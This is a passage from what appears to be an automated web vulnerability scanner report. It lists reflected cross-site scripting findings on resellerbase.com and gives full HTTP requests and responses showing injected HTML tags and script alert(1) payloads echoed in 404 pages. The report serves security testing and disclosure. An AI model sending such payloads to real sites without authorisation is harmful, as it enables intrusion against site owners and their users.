The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f261f<a>daf1880243f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Searchf261f<a>daf1880243f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Searchf261f<a>daf1880243f&opt=2 was not found on this server.</p>
...[SNIP]...

2.2421. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f96f9<a>2e42bfee04b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...f96f9<a>2e42bfee04b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...f96f9<a>2e42bfee04b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2422. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2809<script>alert(1)</script>52f921775bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b2809<script>alert(1)</script>52f921775bb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&b2809<script>alert(1)</script>52f921775bb=1 was not found on this server.</p>
...[SNIP]...

2.2423. http://www.resellerbase.com/detail/35/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ca71a<a>8725c2adc71 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ca71a<a>8725c2adc71 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ca71a<a>8725c2adc71 was not found on this server.</p>
...[SNIP]...

2.2424. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d593d<script>alert(1)</script>56514771969 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild593d<script>alert(1)</script>56514771969/35/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild593d<script>alert(1)</script>56514771969/35/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2425. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76928<script>alert(1)</script>dd9e5de81ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3576928<script>alert(1)</script>dd9e5de81ba/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3576928<script>alert(1)</script>dd9e5de81ba/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2426. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4df69<script>alert(1)</script>5cdd35eec39 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes4df69<script>alert(1)</script>5cdd35eec39/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes4df69<script>alert(1)</script>5cdd35eec39/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2427. http://www.resellerbase.com/detail/35/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c90da<script>alert(1)</script>3dd8fc8cc7e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/search.phpc90da<script>alert(1)</script>3dd8fc8cc7e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.phpc90da<script>alert(1)</script>3dd8fc8cc7e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2428. http://www.resellerbase.com/detail/35/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7b853<a>7a047e6598c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search7b853<a>7a047e6598c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...&Submit3=Search7b853<a>7a047e6598c&opt=2 was not found on this server.</p>
...[SNIP]...

2.2429. http://www.resellerbase.com/detail/35/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ce71b<a>48af4b734ab was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/search.php?keyword=search...ce71b<a>48af4b734ab&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...ce71b<a>48af4b734ab&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2430. http://www.resellerbase.com/detail/35/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ad5ea<script>alert(1)</script>fc2b0c7be69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2&ad5ea<script>alert(1)</script>fc2b0c7be69=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=2&ad5ea<script>alert(1)</script>fc2b0c7be69=1 was not found on this server.</p>
...[SNIP]...

2.2431. http://www.resellerbase.com/detail/35/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7e996<a>08d29b67df9 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=27e996<a>08d29b67df9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/search.php?keyword=search...&Submit3=Search&opt=27e996<a>08d29b67df9 was not found on this server.</p>
...[SNIP]...

2.2432. http://www.resellerbase.com/detail/36/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 784ec<script>alert(1)</script>25920f9ce56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail784ec<script>alert(1)</script>25920f9ce56/36/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail784ec<script>alert(1)</script>25920f9ce56/36/ was not found on this server.</p>
...[SNIP]...

2.2433. http://www.resellerbase.com/detail/36/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 317ad<script>alert(1)</script>d08bc1e9260 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36317ad<script>alert(1)</script>d08bc1e9260/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36317ad<script>alert(1)</script>d08bc1e9260/ was not found on this server.</p>
...[SNIP]...

2.2434. http://www.resellerbase.com/detail/36/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1b4a<script>alert(1)</script>a352411666b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/?e1b4a<script>alert(1)</script>a352411666b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/?e1b4a<script>alert(1)</script>a352411666b=1 was not found on this server.</p>
...[SNIP]...

2.2435. http://www.resellerbase.com/detail/36/nemproduction-com-german.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/nemproduction-com-german.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2cb2<script>alert(1)</script>d318151dfe6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild2cb2<script>alert(1)</script>d318151dfe6/36/nemproduction-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild2cb2<script>alert(1)</script>d318151dfe6/36/nemproduction-com-german.html was not found on this server.</p>
...[SNIP]...

2.2436. http://www.resellerbase.com/detail/36/nemproduction-com-german.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/36/nemproduction-com-german.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4629b<a>b8f0e38ba9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/364629b<a>b8f0e38ba9e/nemproduction-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/364629b<a>b8f0e38ba9e/nemproduction-com-german.html was not found on this server.</p>
...[SNIP]...

2.2437. http://www.resellerbase.com/detail/36/nemproduction-com-german.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/nemproduction-com-german.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8bc8a<script>alert(1)</script>366261e8489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/8bc8a<script>alert(1)</script>366261e8489 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/8bc8a<script>alert(1)</script>366261e8489 was not found on this server.</p>
...[SNIP]...

2.2438. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 281a9<script>alert(1)</script>39e508f508e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail281a9<script>alert(1)</script>39e508f508e/36/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail281a9<script>alert(1)</script>39e508f508e/36/rating.php was not found on this server.</p>
...[SNIP]...

